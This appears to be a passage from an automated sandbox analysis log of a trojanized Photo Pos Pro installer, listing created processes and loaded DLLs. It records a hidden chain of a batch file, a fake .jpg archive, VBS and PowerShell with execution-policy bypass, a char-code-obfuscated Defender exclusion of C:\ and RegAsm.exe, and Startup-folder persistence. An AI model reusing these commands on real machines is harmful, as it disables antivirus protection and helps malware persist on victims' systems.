                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E1026CE2F66F23E6FD1ECE5A164EA903 C
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo Pos Pro\Photo Pos Pro 4.12.43\install\56332C6\setup.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\PhotoPosPro4_SetUp.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740326085 "
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 87A1BFD8CF860810F3553F2BAA316D8B
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E5AA896F17CC944DC7763BCB0AD001B1 E Global\MSI0000
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\PhotoPosPro4_SetUp.exe "C:\Program Files (x86)\PhotoPosPro4_SetUp.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSID82B.tmp "C:\Windows\Installer\MSID82B.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Program Files (x86)\cmd.bat"
                  Source: C:\Windows\Installer\MSID82B.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "tar -xf 18.jpg -C $env:public"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\tar.exe "C:\Windows\system32\tar.exe" -xf 18.jpg -C C:\Users\Public
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Move-Item -Path '18.jpg' -Destination $env:public"
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess created: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exe "C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\18.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionProcess 'RegAsm.exe'"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe "C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe" /install /quiet /norestart
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeProcess created: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exe "C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=580 /install /quiet /norestart
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe "C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe "C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx?NavigatationID=AfterInstallThankYouPage&Param1=PhotoPosPro
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1908,i,17967751664096825877,3136884809953927408,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ebghls.exe C:\Users\user\AppData\Local\Temp\ebghls.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smcdll.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\smcdll.exe "C:\Users\user\AppData\Local\smcdll.exe"
                  Source: C:\Users\user\AppData\Local\smcdll.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo Pos Pro\Photo Pos Pro 4.12.43\install\56332C6\setup.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\PhotoPosPro4_SetUp.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740326085 " Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E1026CE2F66F23E6FD1ECE5A164EA903 CJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 87A1BFD8CF860810F3553F2BAA316D8BJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E5AA896F17CC944DC7763BCB0AD001B1 E Global\MSI0000Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\PhotoPosPro4_SetUp.exe "C:\Program Files (x86)\PhotoPosPro4_SetUp.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSID82B.tmp "C:\Windows\Installer\MSID82B.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Program Files (x86)\cmd.bat"Jump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess created: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exe "C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exe"Jump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "tar -xf 18.jpg -C $env:public" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Move-Item -Path '18.jpg' -Destination $env:public" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\18.vbs" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\tar.exe "C:\Windows\system32\tar.exe" -xf 18.jpg -C C:\Users\PublicJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe "C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe" /install /quiet /norestart
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe "C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe"
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe "C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx?NavigatationID=AfterInstallThankYouPage&Param1=PhotoPosPro
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionProcess 'RegAsm.exe'"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe"
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeProcess created: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exe "C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=580 /install /quiet /norestart
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1908,i,17967751664096825877,3136884809953927408,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\smcdll.exe "C:\Users\user\AppData\Local\smcdll.exe"
                  Source: C:\Users\user\AppData\Local\smcdll.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: davhlpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: lpk.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: msihnd.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
